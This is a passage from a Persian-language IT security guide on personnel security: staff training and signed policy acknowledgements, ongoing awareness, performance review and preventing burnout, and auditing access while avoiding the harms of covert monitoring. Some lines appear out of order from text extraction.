‫ﺭﺍﻳﺎﻧــﻪﺍﻱ ﺑــﺎ ﺷــﺮﻛﺖ )ﺍﺯ ﻃﺮﻳــﻖ ﺗﻠﻔــﻦ(‪ ،‬ﻭ ﺳﻴﺎﺳــﺘﻬﺎﻱ ﺍﻓــﺸﺎﻱ‬
‫ﺁﻣﻮﺯﺵ ﺑﺎﻳﺪ ﺷﺎﻣﻞ ﺍﺳﻨﺎﺩ ﻧﻮﺷﺘﺎﺭﻱ ﻭ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﺳﻴﺎﺳﺘﻬﺎﻱ‬
‫ﻛﺎﺭﺑﺮﺩ ﺭﺍﻳﺎﻧﻪ ﺷﻮﺩ ﻭ ﻣﺒﺎﺣﺜﻲ ﭼﻮﻥ ﻛـﺎﺭﺑﺮﺩ ﺩﺭﺳـﺖ ﻭ ﻧﺎﺩﺭﺳـﺖ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺷﺒﻜﻪﻫﺎ‪ ،‬ﺍﺳﺘﻔﺎﺩﺓ ﺷﺨﺼﻲ ﺍﺯ ﺗﺠﻬﻴﺰﺍﺕ ﺭﺍﻳﺎﻧـﻪﺍﻱ )ﺩﺭ‬
‫ﺧﻼﻝ ﻭ ﺑﻌﺪ ﺍﺯ ﺍﺗﻤﺎﻡ ﺳـﺎﻋﺎﺕ ﻛـﺎﺭ(‪ ،‬ﺳﻴﺎﺳـﺘﻬﺎﻱ ﻣﺎﻟﻜﻴـﺖ ﻭ ﻛـﺎﺭﺑﺮﺩ‬
‫ﭘــﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ‪ ،‬ﻭ ﺳﻴﺎﺳــﺘﻬﺎﻱ ﻣﺮﺑــﻮﻁ ﺑــﻪ ﻭﺭﻭﺩ ﻭ ﺧــﺮﻭﺝ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻭ ﺩﺍﺩﻩﻫﺎ ﺭﺍ ﺩﺭ ﺑﺮ ﮔﻴﺮﺩ‪ .‬ﻣﺠﺎﺯﺍﺗﻬﺎﻱ ﻧﻘـﺾ ﻣﻘـﺮﺭﺍﺕ‬
‫ﻧﻴﺰ ﺑﺎﻳﺪ ﻫﻨﮕﺎﻡ ﺁﻣﻮﺯﺵ ﺷﺮﺡ ﺩﺍﺩﻩ ﺷﻮﻧﺪ‪.‬‬
‫ﻫﻤﺔ ﻛﺎﺭﺑﺮﺍﻥ ﺑﺎﻳﺪ ﻓﺮﻣﻬﺎﻳﻲ ﻣﺒﻨﻲ ﺑﺮ ﺁﮔﺎﻫﻲ ﺍﺯ ﺍﻳﻦ ﺍﻃﻼﻋـﺎﺕ ﻭ‬
‫ﭘﺬﻳﺮﻓﺘﻦ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ ﺁﻥ ﺍﻣﻀﺎ ﻛﻨﻨﺪ‪ .‬ﺍﻳﻦ ﻓﺮﻣﻬـﺎ ﺑﺎﻳـﺪ ﺳـﺎﻟﻬﺎ‬
‫ﻧﮕﻬﺪﺍﺭﻱ ﺷﻮﻧﺪ ﺗﺎ ﺍﮔﺮ ﺑﻌﺪﻫﺎ ﺍﻳﻦ ﺳﺆﺍﻝ ﻣﻄﺮﺡ ﺷﺪ ﻛـﻪ ﺁﻳـﺎ ﺑـﻪ‬
‫ﻛﺎﺭﻣﻨﺪ ﺩﺭ ﻣﻮﺭﺩ ﺁﻧﭽﻪ ﻛﻪ ﺳﺎﺯﻣﺎﻥ ﺩﺭ ﻗﺒﺎﻝ ﻭﻱ ﻣﺠﺎﺯ ﺑﻪ ﺍﻧﺠـﺎﻡ‬
‫ﺁﻥ ﺍﺳﺖ ﺁﮔﺎﻫﻲ ﻗﺒﻠﻲ ﺩﺍﺩﻩ ﺷﺪﻩ ﻳﺎ ﺧﻴـﺮ‪ ،‬ﺑﺘـﻮﺍﻥ ﻳـﻚ ﻣـﺪﺭﻙ‬
‫ﺍﺛﺒﺎﺕﻛﻨﻨﺪﻩ ﺍﺭﺍﺋﻪ ﻛﺮﺩ‪.‬‬
‫ﺁﻣﻮﺯﺵ ﻭ ﺁﮔﺎﻫﻲ ﻣﺪﺍﻭﻡ‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﻻﺯﻡ ﺍﺳﺖ ﺑﻄﻮﺭ ﻣﺘﻨﺎﻭﺏ ﺍﻃﻼﻋﺎﺕ ﺗﺎﺯﻩﺍﻱ ﺩﺭ ﺭﺍﺑﻄﻪ ﺑـﺎ‬
‫ﺍﻣﻨﻴﺖ ﻭ ﺍﺳﺘﻔﺎﺩﺓ ﺻﺤﻴﺢ ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﺩﺭﻳﺎﻓﺖ ﻛﻨﻨﺪ‪ .‬ﺍﻳﻦ ﺑـﺎﺯﺁﻣﻮﺯﻱ‬
‫ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﻓﺮﺻﺖ ﻣﻨﺎﺳـﺒﻲ ﺟﻬـﺖ ﻳـﺎﺩﺁﻭﺭﻱ ﺗﻬﺪﻳـﺪﻫـﺎﻱ‬
‫ﻣﻮﺟــﻮﺩ ﻭ ﭘﻴﺎﻣــﺪﻫﺎﻱ ﺁﻧﻬــﺎ ﺑﻮﺟــﻮﺩ ﻣــﻲﺁﻭﺭﺩ ﻭ ﻳــﻚ ﻓــﻀﺎﻱ‬
‫ﻣﺒﺎﺣﺜﻪﺍﻱ ﺑﺮﺍﻱ ﺗﺒﺎﺩﻝ ﻧﻈﺮ ﻭ ﺩﺭ ﻣﻴﺎﻥ ﮔﺬﺍﺷﺘﻦ ﻧﮕﺮﺍﻧﻴﻬﺎ ﺍﻳﺠـﺎﺩ‬
‫ﻣﻲﻛﻨﺪ‪.‬‬
‫ﻻﺯﻡ ﺍﺳﺖ ﺑﻪ ﻛﺎﺭﻣﻨـﺪﺍﻥ ﻓﺮﺻـﺖ ﻣﻨﺎﺳـﺒﻲ ﺑـﺮﺍﻱ ﺁﻣﻮﺯﺷـﻬﺎﻱ‬
‫ﺟﺎﺭﻱ ﻭ ﺁﺗﻲ ﺑﺪﻫﻴﺪ؛ ﻣﺜﻞ ﺗﺸﻮﻳﻖ ﺑـﻪ ﺣـﻀﻮﺭ ﺩﺭ ﻛﻨﻔﺮﺍﻧـﺴﻬﺎ ﻭ‬
‫ﺳﻤﻴﻨﺎﺭﻫﺎﻱ ﺣﺮﻓﻪﺍﻱ‪ ،‬ﺍﺷﺘﺮﺍﻙ ﺩﺭ ﻧﺸﺮﻳﻪﻫﺎﻱ ﺍﺩﻭﺍﺭﻱ ﺣﺮﻓـﻪﺍﻱ‬
‫ﻭ ﺗﺠﺎﺭﻱ‪ ،‬ﻭ ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﻛﺘﺎﺑﻬﺎﻱ ﻣﺮﺟﻊ ﻭ ﺳﺎﻳﺮ ﻣﻮﺍﺭﺩ ﺁﻣﻮﺯﺷﻲ‪.‬‬
‫ﺑﺎﻳــﺪ ﺑــﻪ ﻛﺎﺭﻣﻨــﺪﺍﻥ ﺯﻣــﺎﻥ ﻛــﺎﻓﻲ ﺑــﺮﺍﻱ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﻛﺘــﺐ ﻭ‬
‫ﺍﻧﮕﻴﺰﻩﻫﺎﻱ ﻻﺯﻡ ﺑﺮﺍﻱ ﻳﺎﺩﮔﻴﺮﻱ ﻣﻬﺎﺭﺗﻬﺎﻱ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺩﺍﺩﻩ ﺷﻮﺩ‪.‬‬
‫ﺩﺭ ﻛﻨﺎﺭ ﺁﻣﻮﺯﺵ ﺩﻭﺭﻩ ﺍﻱ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺎﻳﻞ ﺑﺎﺷﻴﺪ ﺍﺯ ﺭﻭﺷـﻬﺎﻱ‬
‫ﻼ ﻧـﺼﺐ‬
‫ﻣﺘﻨﻮﻉﺗﺮﻱ ﺑﺮﺍﻱ ﺗﺪﺍﻭﻡ ﺍﻳﻦ ﺭﻭﻧﺪ ﺑﻬـﺮﻩ ﮔﻴﺮﻳـﺪ ‪ -‬ﻣـﺜ ﹰ‬
‫ﭘﻮﺳﺘﺮﻫﺎ ﻳﺎ ﺍﻋﻼﻣﻴﻪﻫﺎﻳﻲ ﺩﺭ ﻣﻮﺭﺩ ﺍﻟﮕﻮﻫـﺎﻱ ﺳـﺮﺁﻣﺪﻱ‪ ،‬ﺍﻋـﻼﻡ‬
‫ﺷﻌﺎﺭﻫﺎﻱ ﺭﻭﺯﺍﻧﻪ ﻭ ﻫﻔﺘﮕﻲ‪ ،‬ﻧﺎﻣﮕﺬﺍﺭﻱ ﻳﻚ ﺭﻭﺯ ﺑﻪ ﻋﻨـﻮﺍﻥ "ﺭﻭﺯ‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫ﺑﺮﺭﺳﻴﻬﺎﻱ ﻣﺠﺪﺩ ﻭ ﺩﻭﺭﻩﺍﻱ‬
‫ﺍﻃﻼﻋﺎﺕ ﭘـﺸﺖ ﺗﻠﻔـﻦ ﺑﺎﺷـﺪ‪ .‬ﻣﻘﺎﻣـﺎﺕ ﺍﺟﺮﺍﻳـﻲ ﻧﺒﺎﻳـﺪ ﺑـﺪﻟﻴﻞ‬
‫ﻣﻮﻗﻌﻴﺘﺸﺎﻥ ﺍﺯ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﻣﺴﺘﺜﻨﻲ ﺷـﻮﻧﺪ ‪ -‬ﺁﻧﻬـﺎ ﻫـﻢ ﺍﮔـﺮ ﻧـﻪ‬
‫ﺑﻴﺸﺘﺮ‪ ،‬ﺣﺪﺍﻗﻞ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻛﺎﺭﻛﻨﺎﻥ ﺩﻳﮕﺮ ﺩﺭ ﻣﻌﺮﺽ ﺍﻧﺘﺨﺎﺏ ﺭﻣـﺰ‬
‫ﻋﺒﻮﺭ ﺿﻌﻴﻒ ﻭ ﺳﺎﻳﺮ ﺍﺷﺘﺒﺎﻫﺎﺕ ﻫﺴﺘﻨﺪ‪ .‬ﺁﻧﻬﺎ ﻧﻴﺰ ﺑﺎﻳـﺪ ﭘﺎﻳﺒﻨـﺪﻱ‬
‫ﺧﻮﺩ ﺑﻪ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﻧﺸﺎﻥ ﺩﻫﻨﺪ‪ ،‬ﭼﺮﺍﻛﻪ ﺁﮔﺎﻫﻲ ﺍﻣﻨﻴﺘـﻲ ﺩﺭ‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎ ﺍﺯ ﺑﺎﻻ ﺑﻪ ﭘﺎﺋﻴﻦ ﺟﺮﻳﺎﻥ ﻣﻲﻳﺎﺑﺪ ﻭ ﻧﻪ ﺑﺎﻟﻌﻜﺲ‪.‬‬
‫‪١٦٢‬‬
‫ﺍﻣﻨﻴﺖ"‪ ،‬ﻭ ﻳﺎ ﺑﺮﮔﺰﺍﺭﻱ ﻧﺸﺴﺘﻬﺎ ﻭ ﺳﻤﻴﻨﺎﺭﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺑﻪ ﻣﻨﻈﻮﺭ‬
‫ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﻛﻤﺮﻧﮓ ﺷﺪﻥ ﺍﻫﻤﻴﺖ ﻣﻮﺿـﻮ ﹺﻉ ﺍﻣﻨﻴـﺖ ﺩﺭ ﻣﻨﻈـﺮ‬
‫ﻋﻤﻮﻣﻲ‪.‬‬
‫ﺍﻟﺒﺘﻪ ﺍﻧﺪﺍﺯﻩ ﻭ ﻃﺒﻴﻌﺖ ﺳـﺎﺯﻣﺎﻥ‪ ،‬ﺳـﻄﺢ ﺗﻬﺪﻳـﺪﺍﺕ ﻭ ﺿـﺮﺭﻫﺎﻱ‬
‫ﺍﺣﺘﻤﺎﻟﻲ‪ ،‬ﻭ ﻧﻬﺎﻳﺘﹰﺎ ﺗﻌﺪﺍﺩ ﻭ ﺭﻓﺘﺎﺭ ﻛﺎﺭﻛﻨﺎﻥ ﻫﻤﻪ ﻭ ﻫﻤﻪ ﺍﺯ ﻣﻮﺍﺭﺩﻱ‬
‫ﻫﺴﺘﻨﺪ ﻛﻪ ﻫﻨﮕﺎﻡ ﺗﻨﻈﻴﻢ ﻃﺮﺣﻬـﺎ ﺑﺎﻳـﺪ ﺩﺭﻧﻈـﺮ ﮔﺮﻓﺘـﻪ ﺷـﻮﻧﺪ‪.‬‬
‫ﻫﺰﻳﻨﻪﻫﺎﻱ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺁﮔﺎﻫﻲﺑﺨـﺶ ﻧﻴـﺰ ﺑﺎﻳـﺪ ﺍﺯ ﻗﺒـﻞ ﺩﺭﻧﻈـﺮ‬
‫ﮔﺮﻓﺘﻪ ﻭ ﺩﺭ ﺑﻮﺩﺟﺔ ﺳﺎﺯﻣﺎﻥ ﺁﻣﺪﻩ ﺑﺎﺷﻨﺪ‪.‬‬
‫ﺑﺮﺭﺳﻲ ﻭ ﻛﻨﺘﺮﻝ ﻛﺎﺭﺁﻳﻲ‬
‫ﻛﺎﺭﺁﻳﻲ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺷﻤﺎ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﺩﻭﺭﻩﺍﻱ ﺑﺮﺭﺳﻲ ﺷﻮﺩ‪ .‬ﺑﻄﻮﺭ‬
‫ﺧﺎﺹ‪ ،‬ﺩﺭ ﻗﺒﺎﻝ ﺭﺷﺪ ﺣﺮﻓﻪ ﺍﻱ ﻭ ﻋﻤﻠﻜﺮﺩﻫﺎﻱ ﻣﻮﻓـﻖ ﺑﺎﻳـﺪ ﺑـﻪ‬
‫ﻛﺎﺭﻣﻨﺪﺍﻥ ﺍﻣﺘﻴﺎﺯ ﻭ ﭘﺎﺩﺍﺵ ﺗﻌﻠﻖ ﺑﮕﻴﺮﺩ‪ .‬ﺩﺭ ﻋﻴﻦ ﺣﺎﻝ ﻣـﺸﻜﻼﺕ‬
‫ﺑﺎﻳﺪ ﺑﺼﻮﺭﺗﻲ ﺳﺎﺯﻧﺪﻩ ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﺣﻞ ﺷﻮﻧﺪ‪ .‬ﺷﻤﺎ ﺑﺎﻳﺪ ﻛﺎﺭﻣﻨﺪﺍﻥ‬
‫ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺍﻓﺰﺍﻳﺶ ﺗﻮﺍﻧﺎﻳﻴﻬﺎ ﻭ ﺩﺭﻙ ﺑﻴﺸﺘﺮ ﺗﺸﻮﻳﻖ ﻛﻨﻴﺪ‪.‬‬
‫ﺷـﻤﺎ ﻫﻤﭽﻨـﻴﻦ ﺑﺎﻳـﺪ ﺍﺯ ﺑﻮﺟــﻮﺩ ﺁﻣـﺪﻥ ﺷـﺮﺍﻳﻄﻲ ﻛـﻪ ﺩﺭ ﺁﻧﻬــﺎ‬
‫ﻛﺎﺭﻛﻨﺎﻥ ﺍﺣﺴﺎﺳﻬﺎﻱ ﻣﺨﺮﺑﻲ ﭼﻮﻥ ﺧﺴﺘﮕﻲ ﻣﻔﺮﻁ ﺍﺯ ﻛﺎﺭ ﺯﻳـﺎﺩ‪،‬‬
‫ﺑﻲﺍﺣﺘﺮﺍﻣﻲ‪ ،‬ﻭ ﻳﺎ ﺑﻲﺗﻮﺟﻬﻲ ﭘﻴﺪﺍ ﻣـﻲﻛﻨﻨـﺪ ﺟﻠـﻮﮔﻴﺮﻱ ﻧﻤﺎﻳﻴـﺪ‪.‬‬
‫ﺑﻮﺟﻮﺩ ﺁﻣﺪﻥ ﭼﻨﻴﻦ ﻣﺤﻴﻄﻲ ﺩﺭ ﺍﺩﺍﺭﻩ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻣﻨﺠـﺮ ﺑـﻪ‬
‫ﺑﻲﺗﻮﺟﻬﻲ ﻛﺎﺭﻛﻨﺎﻥ ﺑﻪ ﻣﻨﺎﻓﻊ ﺳﺎﺯﻣﺎﻥ ﺷـﻮﺩ‪ .‬ﻫﻤﭽﻨـﻴﻦ ﻣﻤﻜـﻦ‬
‫ﺍﺳﺖ ﻛﺎﺭﻛﻨﺎﻥ ﺑﺮﺍﻱ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻦ ﺩﺭ ﻓﺮﺻﺘﻬﺎﻱ ﻣﻨﺎﺳـﺒﺘﺮ ﺷـﻐﻠﻲ‬
‫ﺳﺎﺯﻣﺎﻥ ﺷﻤﺎ ﺭﺍ ﺗﺮﻙ ﻛﻨﻨﺪ؛ ﻳﺎ ﺑﺪﺗﺮ ﺍﺯ ﺁﻥ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺑـﺮﺍﻱ‬
‫ﺍﻧﺘﻘﺎﻣﮕﻴﺮﻱ ﺩﺭ ﺑﻌﻀﻲ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺁﺷﻮﺑﮕﺮﺍﻧﻪ ﻋﻠﻴﻪ ﺷﻤﺎ ﻫﻤﻜﺎﺭﻱ‬
‫ﻧﻤﺎﻳﻨﺪ‪ .‬ﺍﺿﺎﻓﻪﻛﺎﺭﻱ ﺑﺎﻳﺪ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺍﺳﺘﺜﻨﺎ ‪ -‬ﻭ ﻧﻪ ﻳﻚ ﺭﻭﺍﻝ ‪-‬‬
‫ﺑﺎﺷﺪ ﻭ ﺑﻪ ﺗﻤﺎﻡ ﻛﺎﺭﻣﻨﺪﺍﻥ ‪ -‬ﺧﺼﻮﺻﹰﺎ ﺁﻧﻬـﺎﻳﻲ ﻛـﻪ ﺩﺭ ﭘـﺴﺘﻬﺎﻱ‬
‫ﺣﺴﺎﺱ ﻫﺴﺘﻨﺪ ‪ -‬ﺑﺎﻳﺪ ﺗﻌﻄﻴﻼﺕ ﻭ ﺍﻭﻗـﺎﺕ ﻓﺮﺍﻏـﺖ ﻛـﺎﻓﻲ ﺩﺍﺩﻩ‬
‫ﺷﻮﺩ‪ .‬ﺍﺿﺎﻓﻪﻛﺎﺭﻱ ﺑـﻪ ﺷـﺪﺕ ﻛﺎﺭﻣﻨـﺪﺍﻥ ﺭﺍ ﺧـﺴﺘﻪ ﻣـﻲ ﻛﻨـﺪ ﻭ‬
‫ﺧﺴﺘﮕﻲ ﻧﻴﺰ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﻛﻪ ﺿﺮﻳﺐ ﺧﻄـﺎﻱ ﺁﻧﻬـﺎ ﺑـﺎﻻ ﺭﻭﺩ‪،‬‬
‫ﻣﺘﻮﺟﻪ ﺍﺷﻜﺎﻻﺕ ﻧﺸﻮﻧﺪ ﻳﺎ ﺍﺯ ﺁﻧﻬﺎ ﭼﺸﻢﭘﻮﺷﻲ ﻛﻨﻨﺪ‪ ،‬ﻭ ﻫﻤﭽﻨﻴﻦ‬
‫ﺍﺯ ﻧﻈﺮ ﻋﺎﻃﻔﻲ ﺁﺳﻴﺐ ﺑﺒﻴﻨﻨﺪ‪ .‬ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺩﺭ ﺯﻧﺪﮔﻲ ﺧﺼﻮﺻﻲ‬
‫ﺁﻧﻬﺎ ﻧﻴﺰ ﻓﺸﺎﺭﻫﺎﻱ ﻋﺼﺒﻲ ﺑﻮﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺁﻣﺪ‪ ،‬ﭼﺮﺍﻛﻪ ﺧﺎﻧﻮﺍﺩﻩﻫـﺎ‬
‫ﻭ ﻋﺰﻳﺰﺍﻧﺸﺎﻥ ﻫﻢ ﻣﻲﺧﻮﺍﻫﻨﺪ ﮔﻬﮕﺎﻩ ﺩﺭ ﻃﻮﻝ ﺭﻭﺯ ﺁﻧﻬﺎ ﺭﺍ ﺑﺒﻴﻨﻨﺪ‪.‬‬
‫ﺑﺮﺍﻱ ﻛﺎﺭﻣﻨﺪﺍﻧﻲ ﻛﻪ ﺑﻴﺶ ﺍﺯ ﺍﻧﺪﺍﺯﻩ ﺗﺤﺖ ﻓﺸﺎﺭ ﻭ ﺧـﺴﺘﻪ ﺑﺎﺷـﻨﺪ‬
‫ﺍﺣﺘﻤﺎﻝ ﺑﻴﺸﺘﺮﻱ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﺁﺯﺭﺩﻩﺧـﺎﻃﺮ ﺷـﻮﻧﺪ ﻭ ﺑـﺪﻳﻬﻲ‬
‫ﺍﺳﺖ ﻛﻪ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺩﺭ ﺑﻬﺒﻮﺩ ﺍﻣﻨﻴﺖ ﻫﻴﭻ ﻛﻤﻜﻲ ﻧﺨﻮﺍﻫﺪ ﻛﺮﺩ‪.‬‬
‫ﺑﻄﻮﺭ ﻛﻠﻲ ﻋﻼﺋﻢ ﻓﺸﺎﺭﻫﺎﻱ ﺭﻭﺍﻧـﻲ ﺯﻳـﺎﺩ‪ ،‬ﻣـﺴﺎﺋﻞ ﺷﺨـﺼﻲ ﻭ‬
‫ﺳﺎﻳﺮ ﺍﻧﻮﺍﻉ ﻣﺸﻜﻼﺕ ﻛﺎﺭﻛﻨﺎﻧﻲ ﻛﻪ ﺍﺯ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺩﺳﺘﺮﺳﻲ ﻧـﺴﺒﺘﹰﺎ‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺑﺎﻻ ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ ﺭﺍ ﺑﺎﻳﺪ ﻛﻨﺘﺮﻝ ﻛﺮﺩ‪ .‬ﺗﺸﺨﻴﺺ ﺍﻳﻦ ﻣـﺸﻜﻼﺕ ﻭ‬
‫ﻞ ﺍﻧـﺴﺎﻧﻴﺖ ﺍﺳـﺖ‪.‬‬
‫ﺩﺭﺻﻮﺭﺕ ﺍﻣﻜﺎﻥ ﻛﻤﻚ ﺑﻪ ﺭﻓﻊ ﺁﻧﻬـﺎ ﺣـﺪﺍﻗ ﹺ‬
‫ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻫﻤﭽﻨﻴﻦ ﺭﺍﻫﻲ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﻣﻨـﺎﺑﻊ ﭘـﺮ ﺍﺭﺯﺵ‬
‫ﺳﺎﺯﻣﺎﻥ ‪ -‬ﺧﻮﺩ ﻛﺎﺭﻛﻨﺎﻥ ﻭ ﻧﻴﺰ ﻣﻨﺎﺑﻌﻲ ﻛـﻪ ﺑـﻪ ﺁﻧﻬـﺎ ﺩﺳﺘﺮﺳـﻲ‬
‫ﺩﺍﺭﻧﺪ ‪ -‬ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫ﺑﺎﺯﺑﻴﻨﻲ ﺩﺳﺘﺮﺳﻴﻬﺎ‬
‫ﻲ ﺩﺳﺘﺮﺳﻴﻬﺎ ﺑـﻪ ﺍﺑـﺰﺍﺭ ﻭ‬
‫ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﺍﻣﻜﺎﻥ ﺑﺎﺯﺑﻴﻨ ﹺ‬
‫ﺍﻃﻼﻋﺎﺕ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻫﺮﻛﺲ ﻛـﻪ‬
‫ﺍﺯ ﻫﺮ ﻧﻮﻉ ﺩﺳﺘﺮﺳﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ ﺍﺯ ﻭﺟـﻮﺩ ﺍﻳـﻦ ﺑـﺎﺯﺑﻴﻨﻲﻫـﺎ‬
‫ﺍﻃﻼﻉ ﺩﺍﺭﺩ‪ .‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻮﺍﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑـﻪ ﺍﻳـﻦ‬
‫ﺩﻟﻴﻞ ﺻﻮﺭﺕ ﻣﻲﮔﻴﺮﺩ ﻛﻪ ﻧﻔـﻮﺫﮔﺮ ﺍﺣـﺴﺎﺱ ﻣـﻲﻛﻨـﺪ ﻛـﺴﻲ‬
‫ﻣﺘﻮﺟﻪ ﻛﺎﺭﻫﺎﻱ ﺍﻭ ﻧﺨﻮﺍﻫﺪ ﺷـﺪ‪ .‬ﺍﮔـﺮ ﻳـﻚ ﺗﺒﻬﻜـﺎﺭ ﺑﺪﺍﻧـﺪ ﻛـﻪ‬
‫ﻓﻌﺎﻟﻴﺘﻬﺎﻳﺶ ﺑﻪ ﺛﺒﺖ ﻣﻲﺭﺳﺪ ﻣﻤﻜﻦ ﺍﺯ ﺍﻧﺠﺎﻡ ﻛﺎﺭﻫـﺎﻱ ﻣﺨـﺮﺏ‬
‫ﺧﻮﺩ ﺻﺮﻓﻨﻈﺮ ﻛﻨﺪ‪ .‬ﻣﻨﻈـﻮﺭ ﺍﺯ ﺑـﺎﺯﺑﻴﻨﻲ ﺗﻨﻬـﺎ ﺑـﺎﺯﺑﻴﻨﻲ ﺛﺒﺘﻬـﺎﻱ‬
‫ﺭﺍﻳﺎﻧــﻪﺍﻱ ﻧﻴــﺴﺖ؛ ﺑﻠﻜــﻪ ﮔﺰﺍﺭﺷــﺎﺕ ﻭﺭﻭﺩ ﻭ ﺧــﺮﻭﺝ ﺍﻓــﺮﺍﺩ ﺍﺯ‬
‫ﺳﺎﺧﺘﻤﺎﻥ‪ ،‬ﺳـﻮﺍﺑﻖ ﺍﺳـﺘﻔﺎﺩﺓ ﺍﻓـﺮﺍﺩ ﺍﺯ ﻗﻔﻠﻬـﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‪ ،‬ﻭ‬
‫ﻫﻤﭽﻨﻴﻦ ﻧﻮﺍﺭﻫﺎﻱ ﺗﻠﻮﻳﺰﻳﻮﻥ ﻣﺪﺍﺭ ﺑﺴﺘﻪ‪ ،‬ﻫﻤﮕﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﻮﺭﺩ‬
‫ﺑﺎﺯﺑﻴﻨﻲ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ ﺗﺎ ﺯﻣﻴﻨﻪ ﺑﺮﺍﻱ ﻣﺴﺌﻮﻟﻴﺖﭘﺬﻳﺮﻱ ﺑﻴﺸﺘﺮ ﻣﻬﻴـﺎ‬
‫ﺷﻮﺩ‪.‬‬
‫ﺑﺎ ﺗﻤﺎﻡ ﺍﻳﻦ ﺍﺣﻮﺍﻝ ﺑﺎﻳﺪ ﻣﺮﺍﻗﺐ ﺁﺛﺎﺭ ﻛﻨﺘﺮﻟﻬـﺎ ﭘﻨﻬـﺎﻧﻲ ﻫـﻢ ﺑـﻮﺩ‪.‬‬
‫ﺍﻓﺮﺍﺩ ﺍﺯ ﺍﻳﻨﻜﻪ ﺑﻪ ﺁﻧﻬﺎ ﺍﻋﺘﻤﺎﺩ ﻧﺸﻮﺩ ﻭ ﺑﻄﻮﺭ ﻣﺨﻔﻴﺎﻧﻪ ﺗﺤﺖ ﻧﻈـﺮ‬
‫ﺑﺎﺷﻨﺪ ﺍﺣﺴﺎﺱ ﻧﺎﺧﺮﺳﻨﺪﻱ ﻣﻲﻛﻨﻨﺪ؛ ﻭ ﺍﮔﺮ ﺑﻔﻬﻤﻨـﺪ ﻛـﻪ ﺗﺤـﺖ‬
‫ﻧﻈﺮ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻋﺼﺒﺎﻧﻲ ﺷﻮﻧﺪ ﻭ ﺣﺘـﻲ ﻋﻤﻠﻜـﺮﺩﻱ‬
‫ﺍﻓﺮﺍﻃﻲ ﺍﺯ ﺧﻮﺩ ﺑﺮﻭﺯ ﺩﻫﻨﺪ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺩﺭ ﺑﻌﻀﻲ ﺍﺯ ﺩﺍﺩﺳـﺮﺍﻫﺎ‬
‫ﺩﻳﺪﻩﺷﺪﻩ ﻛﻪ ﻗـﺎﻧﻮﻥ ﻛـﺎﺭ ﻭ ﻗﺮﺍﺭﺩﺍﺩﻫـﺎﻱ ﺍﺳـﺘﺨﺪﺍﻣﻲ ﺗﻮﺍﻧـﺴﺘﻪ‬
‫ﺑﺎﻋﺚ ﺭﻭﺑﺮﻭ ﺷﺪﻥ ﻛﺎﺭﻓﺮﻣﺎ ﺑﺎ ﺩﺍﺩﺭﺳﻴﻬﺎﻱ ﺳﻨﮕﻴﻦ ﻣﺪﻧﻲ ﺷﻮﺩ‪.‬‬
‫ﺍﮔﺮ ﻧﻈﺎﺭﺕ ﺑﺴﻴﺎﺭ ﺩﻗﻴﻖ ﺑﺎﺷﺪ ﺻﺮﻑ ﻣﻄﻠﻊ ﻛـﺮﺩﻥ ﻛﺎﺭﻣﻨـﺪﺍﻥ ﺍﺯ‬
